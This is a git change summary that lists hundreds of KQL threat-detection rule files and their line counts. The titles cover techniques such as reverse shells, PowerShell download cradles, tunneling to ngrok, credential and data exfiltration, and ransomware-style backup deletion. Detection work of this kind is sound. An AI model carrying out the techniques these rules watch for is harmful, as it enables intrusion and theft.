...y_tools_keyword_lookup_via_findstr_exe.kql | 20 ++++----- ..._and_session_enumeration_using_net_exe.kql | 22 +++++----- .../Discovery/shell_execution_gcc_linux.kql | 18 ++++---- .../shell_execution_via_find_linux.kql | 18 ++++---- .../shell_execution_via_flock_linux.kql | 18 ++++---- .../shell_execution_via_nice_linux.kql | 18 ++++---- .../shell_invocation_via_apt_linux.kql | 20 ++++----- ...ctory_database_snapshot_via_adexplorer.kql | 18 ++++---- .../suspicious_execution_of_hostname.kql | 18 ++++---- .../suspicious_execution_of_systeminfo.kql | 18 ++++---- ..._reconnaissance_activity_using_net_exe.kql | 26 +++++------ .../suspicious_kernel_dump_using_dtrace.kql | 18 ++++---- .../Discovery/suspicious_network_command.kql | 22 +++++----- ...k_connection_to_ip_lookup_service_apis.kql | 22 +++++----- .../suspicious_query_of_machineguid.kql | 18 ++++---- ...vity_using_get_localgroupmember_cmdlet.kql | 22 +++++----- ...nce_activity_via_gathernetworkinfo_vbs.kql | 18 ++++---- .../Discovery/suspicious_use_of_psloglist.kql | 24 +++++----- .../Discovery/suspicious_where_execution.kql | 22 +++++----- .../Discovery/syskey_registry_keys_access.kql | 18 ++++---- ...ault_driver_altitude_using_findstr_exe.kql | 18 ++++---- .../system_information_discovery.kql | 22 +++++----- ...stem_information_discovery_using_ioreg.kql | 26 +++++------ ...em_information_discovery_using_sw_vers.kql | 22 +++++----- ...mation_discovery_using_system_profiler.kql | 24 +++++----- ...rmation_discovery_via_registry_queries.kql | 22 +++++----- ...stem_integrity_protection_sip_disabled.kql | 18 ++++---- ...m_integrity_protection_sip_enumeration.kql | 22 +++++----- ...em_network_connections_discovery_linux.kql | 22 +++++----- ...em_network_connections_discovery_macos.kql | 22 +++++----- ...work_connections_discovery_via_net_exe.kql | 18 ++++---- .../system_network_discovery_linux.kql | 22 +++++----- .../system_network_discovery_macos.kql | 22 +++++----- ...ction_to_active_directory_web_services.kql | 22 +++++----- ...tem_information_discovery_via_wmic_exe.kql | 24 +++++----- KQL/rules/Discovery/use_of_w32tm_as_timer.kql | 22 +++++----- ...overy_and_export_via_get_aduser_cmdlet.kql | 22 +++++----- .../Discovery/vim_gtfobin_abuse_linux.kql | 20 ++++----- KQL/rules/Discovery/whoami_as_parameter.kql | 18 ++++---- .../whoami_exe_execution_anomaly.kql | 26 +++++------ ...hoami_exe_execution_with_output_option.kql | 18 ++++---- ...ell_cmdlets_execution_proccesscreation.kql | 22 +++++----- ...l_sideloading_from_suspicious_location.kql | 18 ++++---- ...ndows_capability_via_powershell_cmdlet.kql | 22 +++++----- .../adwind_rat_jrat_file_artifact.kql | 18 ++++---- .../application_removed_via_wmic_exe.kql | 18 ++++---- .../application_terminated_via_wmic_exe.kql | 18 ++++---- ...ary_binary_execution_using_gup_utility.kql | 22 +++++----- ...arbitrary_msi_download_via_devinit_exe.kql | 18 ++++---- ...ommand_execution_via_settingcontent_ms.kql | 18 ++++---- ...sembly_dll_creation_via_aspnetcompiler.kql | 22 +++++----- .../base64_mz_header_in_commandline.kql | 22 +++++----- .../Execution/bash_interactive_shell.kql | 18 ++++---- ...y_proxy_execution_via_dotnet_trace_exe.kql | 22 +++++----- .../bpftrace_unsafe_option_usage.kql | 22 +++++----- ..._exe_from_potentially_suspicious_paths.kql | 18 ++++---- .../capsh_shell_invocation_linux.kql | 18 ++++---- ...wershell_policies_to_an_insecure_level.kql | 22 +++++----- ...eadless_execution_to_mockbin_like_site.kql | 18 ++++---- ...ted_in_a_potential_suspicious_location.kql | 18 ++++---- ...clr_dll_loaded_via_office_applications.kql | 18 ++++---- ...ing_space_characters_execution_anomaly.kql | 20 ++++----- ...cmstp_uac_bypass_via_com_object_access.kql | 22 +++++----- ...ith_suspicious_url_and_appdata_strings.kql | 22 +++++----- ...omputer_password_change_via_ksetup_exe.kql | 18 ++++---- ...conhost_exe_commandline_path_traversal.kql | 22 +++++----- ...ost_spawned_by_uncommon_parent_process.kql | 18 ++++---- ...ion_form_potentially_suspicious_parent.kql | 18 ++++---- ...t_potentially_suspicious_child_process.kql | 24 +++++----- ...pt_uncommon_script_extension_execution.kql | 18 ++++---- .../csexec_service_file_creation.kql | 18 ++++---- ...quest_with_potential_custom_user_agent.kql | 18 ++++---- ...ta_export_from_mssql_table_via_bcp_exe.kql | 24 +++++----- ..._of_powershell_execution_via_sqlps_exe.kql | 24 +++++----- ...mbly_dll_loaded_via_office_application.kql | 18 ++++---- ...nternals_suspicious_powershell_cmdlets.kql | 24 +++++----- .../Execution/enable_bpf_kprobes_tracing.kql | 18 ++++---- ...enable_microsoft_dynamic_data_exchange.kql | 18 ++++---- .../Execution/esxi_vm_kill_via_esxcli.kql | 22 +++++----- .../exchange_powershell_snap_ins_usage.kql | 18 ++++---- .../execute_code_with_pester_bat.kql | 22 +++++----- ...execute_code_with_pester_bat_as_parent.kql | 22 +++++----- ..._of_powershell_script_in_public_folder.kql | 22 +++++----- ...ed_in_potentially_suspicious_directory.kql | 18 ++++---- .../file_decryption_using_gpg4win.kql | 18 ++++---- ...file_download_from_ip_url_via_curl_exe.kql | 18 ++++---- ..._via_gpg4win_from_suspicious_locations.kql | 18 ++++---- .../file_encryption_using_gpg4win.kql | 18 ++++---- ...nsion_created_by_an_office_application.kql | 18 ++++---- ...edpaths_from_browser_file_upload_abuse.kql | 18 ++++---- ...process_from_browser_file_upload_abuse.kql | 26 +++++------ .../Execution/forfiles_command_execution.kql | 26 +++++------ .../fsutil_behavior_set_symlinkevaluation.kql | 24 +++++----- ...gac_dll_loaded_via_office_applications.kql | 22 +++++----- .../hacktool_covenant_powershell_launcher.kql | 18 ++++---- .../hacktool_crackmapexec_execution.kql | 18 ++++---- ...ol_crackmapexec_powershell_obfuscation.kql | 18 ++++---- ...rsploit_empire_scheduled_task_creation.kql | 22 +++++----- ...ol_empire_powershell_launch_parameters.kql | 22 +++++----- ...ol_jlaive_in_memory_assembly_execution.kql | 18 ++++---- .../Execution/hacktool_koadic_execution.kql | 18 ++++---- .../Execution/hacktool_pchunter_execution.kql | 22 +++++----- ...ial_impacket_lateral_movement_activity.kql | 18 ++++---- ...l_redmimicry_winnti_playbook_execution.kql | 18 ++++---- ...hacktool_sharpwsus_wsuspendu_execution.kql | 20 ++++----- ...ool_sliver_c2_implant_activity_pattern.kql | 22 +++++----- .../hacktool_stracciatella_execution.kql | 22 +++++----- ...ware_model_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...hidden_powershell_in_link_file_pattern.kql | 22 +++++----- ...mputer_zone_for_http_protocols_via_cli.kql | 18 ++++---- ...om_suspicious_directories_proccreation.kql | 18 ++++---- ...tion_spawn_shell_via_os_system_library.kql | 18 ++++---- ...secure_proxy_doh_transfer_via_curl_exe.kql | 22 +++++----- .../insecure_transfer_via_curl_exe.kql | 22 +++++----- .../installation_of_wsl_kali_linux.kql | 24 +++++----- .../interactive_bash_suspicious_children.kql | 22 +++++----- KQL/rules/Execution/jamf_mdm_execution.kql | 22 +++++----- ...mdm_potential_suspicious_child_process.kql | 22 +++++----- .../java_running_with_remote_debugging.kql | 18 ++++---- .../jxa_in_memory_execution_via_osascript.kql | 18 ++++---- ...security_stopped_via_commandline_linux.kql | 24 +++++----- .../Execution/linux_hacktool_execution.kql | 22 +++++----- .../linux_reverse_shell_indicator.kql | 18 ++++---- .../local_file_read_using_curl_exe.kql | 18 ++++---- ...on_user_password_change_via_ksetup_exe.kql | 18 ++++---- ...acos_scripting_interpreter_applescript.kql | 22 +++++----- ...d_powershell_keywords_in_command_lines.kql | 18 ++++---- ...powershell_commandlets_processcreation.kql | 18 ++++---- ...icious_powershell_scripts_filecreation.kql | 18 ++++---- ...l_add_in_loaded_from_uncommon_location.kql | 22 +++++----- ...a_for_outlook_addin_loaded_via_outlook.kql | 22 +++++----- .../Execution/mmc20_lateral_movement.kql | 22 +++++----- ...h_reversed_extensions_using_rtlo_abuse.kql | 24 +++++----- .../mmc_loading_script_engines_dlls.kql | 24 +++++----- .../named_pipe_created_via_mkfifo.kql | 18 ++++---- .../net_webclient_casing_anomalies.kql | 18 ++++---- ...k_connection_initiated_by_eqnedt32_exe.kql | 22 +++++----- ...k_connection_initiated_by_regsvr32_exe.kql | 18 ++++---- .../new_application_in_appcompat.kql | 26 +++++------ .../new_process_created_via_wmic_exe.kql | 18 ++++---- ...l_smart_card_created_via_tpmvscmgr_exe.kql | 22 +++++----- .../nodejs_execution_of_javascript_file.kql | 28 ++++++------ KQL/rules/Execution/nohup_execution.kql | 22 +++++----- ...interactive_powershell_process_spawned.kql | 22 +++++----- ...ted_network_connection_to_non_local_ip.kql | 30 ++++++------- ...erator_bloopers_cobalt_strike_commands.kql | 18 ++++---- ...perator_bloopers_cobalt_strike_modules.kql | 18 ++++---- ...otentially_suspicious_applet_osascript.kql | 18 ++++---- .../osacompile_run_only_execution.kql | 18 ++++---- ...nnection_initiated_by_microsoft_dialer.kql | 26 +++++------ ...eunsafeclientmailrules_setting_enabled.kql | 18 ++++---- ...d_and_decrypted_via_built_in_utilities.kql | 18 ++++---- .../Execution/pcre_net_package_image_load.kql | 18 ++++---- .../Execution/pcre_net_package_temp_files.kql | 18 ++++---- ...oy_remote_adminstartion_tool_execution.kql | 22 +++++----- .../perl_inline_command_execution.kql | 18 ++++---- .../php_inline_command_execution.kql | 18 ++++---- ...rbitrary_command_execution_via_ftp_exe.kql | 18 ++++---- ...arbitrary_file_download_via_cmdl32_exe.kql | 22 +++++----- ...inary_impersonating_sysinternals_tools.kql | 22 +++++----- ...ial_binary_proxy_execution_via_cdb_exe.kql | 22 +++++----- ...al_clickfix_execution_pattern_registry.kql | 28 ++++++------ ...otential_cobaltstrike_process_patterns.kql | 18 ++++---- ...commandline_path_traversal_via_cmd_exe.kql | 22 +++++----- .../potential_cookies_session_hijacking.kql | 18 ++++---- ...tration_activity_via_commandline_tools.kql | 22 +++++----- ...tial_dll_injection_via_acccheckconsole.kql | 26 +++++------ .../potential_dosfuscation_activity.kql | 18 ++++---- ...r_script_execution_via_wscript_cscript.kql | 22 +++++----- ..._spoofing_using_right_to_left_override.kql | 22 +++++----- ...tential_netcat_reverse_shell_execution.kql | 22 +++++----- ...potential_perl_reverse_shell_execution.kql | 22 +++++----- ...etoolboxcmd_exe_vm_state_change_script.kql | 18 ++++---- .../Execution/potential_php_reverse_shell.kql | 20 ++++----- ...al_powershell_command_line_obfuscation.kql | 24 +++++----- ..._powershell_obfuscation_via_wchar_char.kql | 18 ++++---- ...ial_powershell_reverseshell_connection.kql | 22 +++++----- ...duct_class_reconnaissance_via_wmic_exe.kql | 26 +++++------ ...al_product_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...tential_rdp_session_hijacking_activity.kql | 22 +++++----- ...ger_content_execution_via_werfault_exe.kql | 18 ++++---- .../potential_renamed_rundll32_execution.kql | 22 +++++----- .../potential_ruby_reverse_shell.kql | 18 ++++---- ..._shelldispatch_dll_functionality_abuse.kql | 22 +++++----- ...er_launch_from_document_reader_process.kql | 22 +++++----- ...rvice_path_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...potential_winapi_calls_via_commandline.kql | 22 +++++----- ...l_movement_wmiprvse_spawned_powershell.kql | 26 +++++------ .../potential_xterm_reverse_shell.kql | 18 ++++---- ...child_process_of_clickonce_application.kql | 18 ++++---- ...lly_suspicious_child_process_of_vscode.kql | 22 +++++----- ...suspicious_child_process_of_winrar_exe.kql | 18 ++++---- ...d_executed_via_run_dialog_box_registry.kql | 20 ++++----- ...cious_electron_application_commandline.kql | 22 +++++----- ...uspicious_execution_of_pdqdeployrunner.kql | 22 +++++----- ...file_sharing_domain_via_powershell_exe.kql | 18 ++++---- ...javascript_execution_via_nodejs_binary.kql | 22 +++++----- ...spicious_named_pipe_created_via_mkfifo.kql | 18 ++++---- ...tially_suspicious_webdav_lnk_execution.kql | 18 ++++---- .../powershell_as_a_service_in_registry.kql | 18 ++++---- .../powershell_base64_encoded_iex_cmdlet.kql | 18 ++++---- ...wershell_base64_encoded_invoke_keyword.kql | 18 ++++---- ...ase64_encoded_reflective_assembly_load.kql | 22 +++++----- .../powershell_base64_encoded_wmi_classes.kql | 18 ++++---- ...e_dll_loaded_by_non_powershell_process.kql | 26 +++++------ ...ershell_download_and_execution_cradles.kql | 22 +++++----- .../Execution/powershell_download_pattern.kql | 18 ++++---- ...with_potential_decryption_capabilities.kql | 22 +++++----- ...owershell_inline_execution_from_a_file.kql | 18 ++++---- ...dowsinstaller_com_from_remote_location.kql | 24 +++++----- ...rshell_script_execution_policy_enabled.kql | 22 +++++----- .../powershell_script_run_in_appdata.kql | 22 +++++----- .../process_reconnaissance_via_wmic_exe.kql | 18 ++++---- KQL/rules/Execution/psexec_execution.kql | 22 +++++----- ...hild_process_execution_as_local_system.kql | 22 +++++----- .../Execution/psexec_service_execution.kql | 22 +++++----- .../psexec_service_file_creation.kql | 18 ++++---- .../Execution/pua_advancedrun_execution.kql | 18 ++++---- KQL/rules/Execution/pua_nircmd_execution.kql | 22 +++++----- .../pua_nircmd_execution_as_local_system.kql | 22 +++++----- KQL/rules/Execution/pua_nsudo_execution.kql | 22 +++++----- .../pua_radmin_viewer_utility_execution.kql | 18 ++++---- KQL/rules/Execution/pua_runxcmd_execution.kql | 22 +++++----- .../pua_wsudo_suspicious_execution.kql | 18 ++++---- .../python_inline_command_execution.kql | 22 +++++----- ...l_execution_via_pty_and_socket_modules.kql | 18 ++++---- .../python_spawning_pretty_tty_on_windows.kql | 18 ++++---- ...hon_spawning_pretty_tty_via_pty_module.kql | 18 ++++---- .../Execution/query_usage_to_exfil_data.kql | 18 ++++---- .../read_contents_from_stdin_via_cmd_exe.kql | 18 ++++---- ...formance_counter_values_via_lodctr_exe.kql | 22 +++++----- .../remcom_service_file_creation.kql | 18 ++++---- ...with_known_revoked_signing_certificate.kql | 28 ++++++------ ...screenconnect_remote_command_execution.kql | 22 +++++----- ...cess_tool_screenconnect_temporary_file.kql | 24 +++++----- .../remote_dll_load_via_rundll32_exe.kql | 18 ++++---- ...powershell_session_host_process_winrm_.kql | 22 +++++----- .../Execution/renamed_curl_exe_execution.kql | 18 ++++---- .../Execution/renamed_ftp_exe_execution.kql | 18 ++++---- .../renamed_jusched_exe_execution.kql | 18 ++++---- .../renamed_nircmd_exe_execution.kql | 18 ++++---- .../renamed_pingcastle_binary_execution.kql | 18 ++++---- .../renamed_psexec_service_execution.kql | 22 +++++----- .../ruby_inline_command_execution.kql | 18 ++++---- .../scheduled_cron_task_job_linux.kql | 22 +++++----- .../scheduled_cron_task_job_macos.kql | 22 +++++----- ...heduled_task_creation_via_schtasks_exe.kql | 24 +++++----- ...script_event_consumer_spawning_process.kql | 18 ++++---- ...reter_execution_from_suspicious_folder.kql | 18 ++++---- .../service_reconnaissance_via_wmic_exe.kql | 24 +++++----- .../service_started_stopped_via_wmic_exe.kql | 18 ++++---- ...type_change_via_powershell_set_service.kql | 22 +++++----- .../service_startuptype_change_via_sc_exe.kql | 22 +++++----- ...on_of_process_located_in_tmp_directory.kql | 18 ++++---- .../shell_execution_via_git_linux.kql | 18 ++++---- .../shell_execution_via_rsync_linux.kql | 22 +++++----- ...shell_invocation_via_env_command_linux.kql | 22 +++++----- .../shell_invocation_via_ssh_linux.kql | 18 ++++---- .../silenttrinity_stager_msbuild_activity.kql | 18 ++++---- ...ent_tools_powershell_session_detection.kql | 24 +++++----- .../start_windows_service_via_net_exe.kql | 22 +++++----- .../successful_account_login_via_wmi.kql | 24 +++++----- ..._binaries_and_scripts_in_public_folder.kql | 22 +++++----- ...ectory_spawned_from_office_application.kql | 18 ++++---- ...suspicious_child_process_of_bginfo_exe.kql | 18 ++++---- ...s_deno_file_written_from_remote_source.kql | 24 +++++----- ...load_and_execute_pattern_via_curl_wget.kql | 30 ++++++------- ...s_electron_application_child_processes.kql | 18 ++++---- ...reflection_assembly_load_function_call.kql | 22 +++++----- ...icious_encoded_powershell_command_line.kql | 18 ++++---- ...cious_execution_location_of_wermgr_exe.kql | 18 ++++---- ...us_execution_of_powershell_with_base64.kql | 18 ++++---- ...th_whitespace_padding_clickfix_filefix.kql | 22 +++++----- ..._characteristics_due_to_missing_fields.kql | 18 ++++---- .../suspicious_file_created_in_perflogs.kql | 22 +++++----- ..._from_file_sharing_domain_via_curl_exe.kql | 18 ++++---- ..._from_file_sharing_domain_via_wget_exe.kql | 18 ++++---- ...ous_file_download_from_ip_via_curl_exe.kql | 18 ++++---- ...ous_file_download_from_ip_via_wget_exe.kql | 18 ++++---- ...le_download_from_ip_via_wget_exe_paths.kql | 18 ++++---- ...tion_from_internet_hosted_webdav_share.kql | 18 ++++---- ...cious_greedy_compression_using_rar_exe.kql | 18 ++++---- ...icious_installer_package_child_process.kql | 22 +++++----- ...cious_interactive_powershell_as_system.kql | 24 +++++----- ...ious_invocation_of_shell_via_awk_linux.kql | 20 ++++----- ...spicious_invocation_of_shell_via_rsync.kql | 18 ++++---- .../suspicious_java_children_processes.kql | 18 ++++---- ...s_microsoft_office_child_process_macos.kql | 18 ++++---- ...uspicious_mshta_exe_execution_patterns.kql | 18 ++++---- .../Execution/suspicious_nohup_execution.kql | 18 ++++---- .../suspicious_outlook_child_process.kql | 18 ++++---- ...etoolboxcmd_exe_vm_state_change_script.kql | 18 ++++---- ...owershell_download_and_execute_pattern.kql | 22 +++++----- ...us_powershell_encoded_command_patterns.kql | 22 +++++----- ...ious_powershell_iex_execution_patterns.kql | 22 +++++----- ...picious_powershell_parameter_substring.kql | 18 ++++---- .../suspicious_powershell_parent_process.kql | 22 +++++----- ...uspicious_process_created_via_wmic_exe.kql | 18 ++++---- .../Execution/suspicious_program_names.kql | 22 +++++----- ...ious_remote_child_process_from_outlook.kql | 18 ++++---- .../suspicious_runscripthelper_exe.kql | 18 ++++---- .../suspicious_scan_loop_network.kql | 22 +++++----- ...ious_script_execution_from_temp_folder.kql | 22 +++++----- ...cters_in_runmru_registry_path_clickfix.kql | 22 +++++----- ...rs_in_typedpaths_registry_path_filefix.kql | 22 +++++----- ...suspicious_spool_service_child_process.kql | 18 ++++---- ...ious_use_of_csharp_interactive_console.kql | 22 +++++----- ...icious_windowsterminal_child_processes.kql | 22 +++++----- ...ious_wmic_execution_via_office_process.kql | 18 ++++---- .../suspicious_wmiprvse_child_process.kql | 18 ++++---- .../suspicious_wsman_provider_image_loads.kql | 18 ++++---- .../suspicious_zipexec_execution.kql | 18 ++++---- .../Execution/sysprep_on_appdata_folder.kql | 22 +++++----- ...and_volume_reconnaissance_via_wmic_exe.kql | 22 +++++----- .../uac_bypass_using_idiagnostic_profile.kql | 18 ++++---- ..._bypass_using_idiagnostic_profile_file.kql | 18 ++++---- .../uncommon_child_process_of_bginfo_exe.kql | 18 ++++---- ...uncommon_child_processes_of_sndvol_exe.kql | 18 ++++---- ..._one_time_only_scheduled_task_at_00_00.kql | 22 +++++----- .../unusual_parent_process_for_cmd_exe.kql | 18 ++++---- ...ge_of_web_request_commands_and_cmdlets.kql | 22 +++++----- .../Execution/use_of_fsharp_interpreters.kql | 24 +++++----- KQL/rules/Execution/use_of_openconsole.kql | 22 +++++----- .../Execution/use_of_pcalua_for_execution.kql | 22 +++++----- .../vba_dll_loaded_via_office_application.kql | 22 +++++----- ...pressanykey_arbitrary_binary_execution.kql | 22 +++++----- ...ejstools_pressanykey_renamed_execution.kql | 18 ++++---- .../vmtoolsd_suspicious_child_process.kql | 22 +++++----- ...ix_updates_reconnaissance_via_wmic_exe.kql | 18 ++++---- ...cation_file_write_to_suspicious_folder.kql | 18 ++++---- ...le_file_creation_by_non_system_process.kql | 18 ++++---- .../wmic_remote_command_execution.kql | 18 ++++---- .../Execution/wmiprvse_spawned_a_process.kql | 22 +++++----- .../wmiprvse_wbemcomn_dll_hijack.kql | 18 ++++---- .../wmiprvse_wbemcomn_dll_hijack_file.kql | 18 ++++---- .../wscript_or_cscript_dropper_file.kql | 18 ++++---- .../wscript_shell_run_in_commandline.kql | 22 +++++----- .../Execution/wsl_child_process_anomaly.kql | 18 ++++---- ...process_located_in_suspicious_location.kql | 20 ++++----- ...rectory_structure_export_via_csvde_exe.kql | 18 ++++---- ...ectory_structure_export_via_ldifde_exe.kql | 18 ++++---- ..._download_via_configsecuritypolicy_exe.kql | 22 +++++----- ...n_to_ngrok_tunneling_service_initiated.kql | 26 +++++------ ...ation_to_ngrok_tunneling_service_linux.kql | 22 +++++----- .../disk_image_creation_via_hdiutil_macos.kql | 22 +++++----- ...ltration_and_tunneling_tools_execution.kql | 22 +++++----- .../email_exifiltration_via_powershell.kql | 18 ++++---- ...ports_critical_registry_keys_to_a_file.kql | 22 +++++----- .../exports_registry_key_to_a_file.kql | 22 +++++----- ...s_data_exfiltration_by_datasvcutil_exe.kql | 26 +++++------ ...nnection_initiated_to_btunnels_domains.kql | 24 +++++----- ...itiated_to_cloudflared_tunnels_domains.kql | 24 +++++----- ...nection_initiated_to_devtunnels_domain.kql | 22 +++++----- ...etwork_connection_initiated_to_mega_nz.kql | 24 +++++----- ...d_to_visual_studio_code_tunnels_domain.kql | 22 +++++----- ...ted_network_connection_to_ngrok_domain.kql | 26 +++++------ .../Exfiltration/pua_rclone_execution.kql | 18 ++++---- .../pua_restic_backup_tool_execution.kql | 26 +++++------ .../python_webserver_execution_linux.kql | 26 +++++------ .../rclone_config_file_creation.kql | 22 +++++----- .../Exfiltration/split_a_file_into_pieces.kql | 22 +++++----- .../suspicious_curl_file_upload_linux.kql | 22 +++++----- .../suspicious_outbound_smtp_connections.kql | 24 +++++----- ...ous_powershell_mailbox_export_to_share.kql | 18 ++++---- ...cious_redirection_to_local_admin_share.kql | 18 ++++---- ...bdav_client_execution_via_rundll32_exe.kql | 18 ++++---- .../Exfiltration/tap_installer_execution.kql | 22 +++++----- ...bdav_client_execution_via_rundll32_exe.kql | 20 ++++----- .../all_backups_deleted_via_wbadmin_exe.kql | 22 +++++----- KQL/rules/Impact/backup_files_deleted.kql | 22 +++++----- ...onfiguration_tampering_via_bcdedit_exe.kql | 22 +++++----- ...copy_from_volumeshadowcopy_via_cmd_exe.kql | 22 +++++----- KQL/rules/Impact/dd_file_overwrite.kql | 22 +++++----- .../Impact/delete_all_scheduled_tasks.kql | 22 +++++----- .../delete_important_scheduled_task.kql | 22 +++++----- ...eleted_data_overwritten_via_cipher_exe.kql | 22 +++++----- ..._shadow_copies_via_wmi_with_powershell.kql | 18 ++++---- .../disable_important_scheduled_task.kql | 18 ++++---- ...e_recovery_from_backup_via_wbadmin_exe.kql | 20 ++++----- .../group_has_been_deleted_via_groupdel.kql | 22 +++++----- KQL/rules/Impact/history_file_deletion.kql | 22 +++++----- .../Impact/linux_crypto_mining_indicators.kql | 22 +++++----- .../linux_crypto_mining_pool_connections.kql | 22 +++++----- ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 26 +++++------ ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 28 ++++++------ ..._communication_with_crypto_mining_pool.kql | 22 +++++----- ...added_to_time_machine_via_tmutil_macos.kql | 24 +++++----- ...or_ca_or_authroot_certificate_to_store.kql | 18 ++++---- .../Impact/portable_gpg_exe_execution.kql | 18 ++++---- .../potential_crypto_mining_activity.kql | 24 +++++----- ...ile_overwrite_via_sysinternals_sdelete.kql | 18 ++++---- ...are_activity_using_legalnotice_message.kql | 18 ++++---- ...potential_secure_deletion_with_sdelete.kql | 24 +++++----- ...ous_change_to_sensitive_critical_files.kql | 22 +++++----- .../registry_disable_system_restore.kql | 18 ++++---- .../Impact/renamed_gpg_exe_execution.kql | 18 ++++---- ...renamed_sysinternals_sdelete_execution.kql | 22 +++++----- ...e_access_via_volume_shadow_copy_backup.kql | 22 +++++----- .../stop_windows_service_via_net_exe.kql | 22 +++++----- ...ws_service_via_powershell_stop_service.kql | 22 +++++----- .../stop_windows_service_via_sc_exe.kql | 22 +++++----- ...ious_creation_txt_file_in_user_desktop.kql | 18 ++++---- .../suspicious_execution_of_shutdown.kql | 18 ++++---- ...cious_execution_of_shutdown_to_log_out.kql | 18 ++++---- .../suspicious_macos_firmware_activity.kql | 22 +++++----- .../Impact/suspicious_reg_add_bitlocker.kql | 22 +++++----- .../Impact/system_shutdown_reboot_macos.kql | 22 +++++----- ...ckup_deletion_attempt_via_tmutil_macos.kql | 24 +++++----- ...chine_backup_disabled_via_tmutil_macos.kql | 24 +++++----- .../user_has_been_deleted_via_userdel.kql | 22 +++++----- ...windows_backup_deleted_via_wbadmin_exe.kql | 26 +++++------ ...very_environment_disabled_via_reagentc.kql | 26 +++++------ .../disk_image_mounting_via_hdiutil_macos.kql | 22 +++++----- .../iso_file_created_within_temp_folders.kql | 22 +++++----- ..._image_mount_indicator_in_recent_files.kql | 24 +++++----- .../octopus_scanner_malware.kql | 18 ++++---- .../office_macro_file_creation.kql | 22 +++++----- ..._file_creation_from_suspicious_process.kql | 18 ++++---- .../office_macro_file_download.kql | 26 +++++------ .../phishing_pattern_iso_in_archive.kql | 22 +++++----- ...reenconnect_server_web_shell_execution.kql | 22 +++++----- ...sions_via_the_registry_2_vpn_extension.kql | 18 ++++---- .../shell_process_spawned_by_java_exe.kql | 24 +++++----- ...suspicious_browser_child_process_macos.kql | 22 +++++----- ...suspicious_child_process_of_sql_server.kql | 18 ++++---- ...icious_child_process_of_veeam_dabatase.kql | 18 ++++---- ...icious_double_extension_file_execution.kql | 18 ++++---- ...xecution_from_outlook_temporary_folder.kql | 18 ++++---- ...ious_execution_via_macos_script_editor.kql | 18 ++++---- ...created_in_outlook_temporary_directory.kql | 24 +++++----- ..._write_to_sharepoint_layouts_directory.kql | 20 ++++----- .../suspicious_hwp_sub_processes.kql | 18 ++++---- ...ine_padding_with_whitespace_characters.kql | 24 +++++----- ...icious_microsoft_onenote_child_process.kql | 22 +++++----- ...sexchangemailboxreplication_aspx_write.kql | 18 ++++---- ...spicious_processes_spawned_by_java_exe.kql | 24 +++++----- .../suspicious_processes_spawned_by_winrm.kql | 22 +++++----- ...s_shells_spawn_by_java_utility_keytool.kql | 18 ++++---- .../terminal_service_process_spawn.kql | 18 ++++---- ...er_added_to_remote_desktop_users_group.kql | 22 +++++----- ...ows_registry_trust_record_modification.kql | 22 +++++----- ...rom_or_to_admin_share_or_sysvol_folder.kql | 22 +++++----- .../hacktool_sharpmove_tool_execution.kql | 18 ++++---- .../hacktool_winrm_access_via_evil_winrm.kql | 18 ++++---- .../mmc_spawning_windows_shell.kql | 18 ++++---- ...tsc_exe_execution_from_uncommon_parent.kql | 22 +++++----- ...rt_forwarding_rule_added_via_netsh_exe.kql | 24 +++++----- .../new_portproxy_registry_entry_added.kql | 24 +++++----- ...top_connection_initiated_via_mstsc_exe.kql | 24 +++++----- ...dp_connections_over_non_standard_tools.kql | 24 +++++----- ...nternetexplorer_application_dll_hijack.kql | 18 ++++---- ...orer_application_dll_hijack_image_load.kql | 18 ++++---- ...eral_movement_via_activatemicrosoftapp.kql | 18 ++++---- ...eral_movement_via_windows_remote_shell.kql | 22 +++++----- .../potential_mstsc_shadowing_activity.kql | 18 ++++---- .../potential_remote_desktop_tunneling.kql | 18 ++++---- ...scalation_via_named_pipe_impersonation.kql | 22 +++++----- .../psexec_remote_execution_file_artefact.kql | 22 +++++----- ...rt_forwarding_rule_added_via_netsh_exe.kql | 22 +++++----- .../rundll32_execution_without_parameters.kql | 22 +++++----- .../suspicious_csi_exe_usage.kql | 22 +++++----- .../suspicious_rdp_redirect_using_tscon.kql | 18 ++++---- .../suspicious_sysaidserver_child.kql | 18 ++++---- .../suspicious_ultravnc_execution.kql | 18 ++++---- .../windows_admin_share_mount_via_net_exe.kql | 22 +++++----- ..._hosted_webdav_share_mount_via_net_exe.kql | 18 ++++---- .../windows_share_mount_via_net_exe.kql | 22 +++++----- .../winrs_local_command_execution.kql | 24 +++++----- ...mers_activity_via_scrcons_exe_dll_load.kql | 24 +++++----- .../wmiexec_default_output_file.kql | 22 +++++----- ...sions_to_hide_services_via_set_service.kql | 22 +++++----- ..._windows_security_center_notifications.kql | 18 ++++---- ...ugger_entry_to_aedebug_for_persistence.kql | 22 +++++----- ...ger_entry_to_hangs_key_for_persistence.kql | 22 +++++----- .../add_disallowrun_execution_to_registry.kql | 18 ++++---- .../allow_rdp_remote_assistance_feature.kql | 22 +++++----- KQL/rules/Persistence/change_the_fax_dll.kql | 18 ++++---- ...ccount_associated_with_the_fax_service.kql | 18 ++++---- .../chopper_webshell_process_pattern.kql | 18 ++++---- ...nstance_executed_with_custom_extension.kql | 22 +++++----- .../clickonce_trust_prompt_tampering.kql | 22 +++++----- .../Persistence/com_hijack_via_sdclt.kql | 18 ++++---- ...nication_to_uncommon_destination_ports.kql | 18 ++++---- .../crashcontrol_crashdump_disabled.kql | 22 +++++----- ..._local_hidden_user_account_by_registry.kql | 18 ++++---- .../creation_of_a_local_user_account.kql | 22 +++++----- ..._internal_tools_or_feature_in_registry.kql | 22 +++++----- ..._windows_security_center_notifications.kql | 18 ++++---- ..._hijackig_via_additional_space_in_path.kql | 20 ++++----- .../dns_over_https_enabled_by_registry.kql | 26 +++++------ .../dropping_of_password_filter_dll.kql | 18 ++++---- .../Persistence/enable_lm_hash_storage.kql | 20 ++++----- .../enable_lm_hash_storage_proccreation.kql | 20 ++++----- ...ing_cor_profiler_environment_variables.kql | 18 ++++---- .../esxi_account_creation_via_esxcli.kql | 22 +++++----- ...mission_assigned_to_account_via_esxcli.kql | 22 +++++----- .../etw_logging_disabled_for_rpcrt4_dll.kql | 18 ++++---- .../etw_logging_disabled_for_scm.kql | 18 ++++---- ...abled_in_net_processes_sysmon_registry.kql | 18 ++++---- .../hacktool_powerup_write_hijack_dll.kql | 26 +++++------ ...acktool_sharpup_privesc_tool_execution.kql | 18 ++++---- 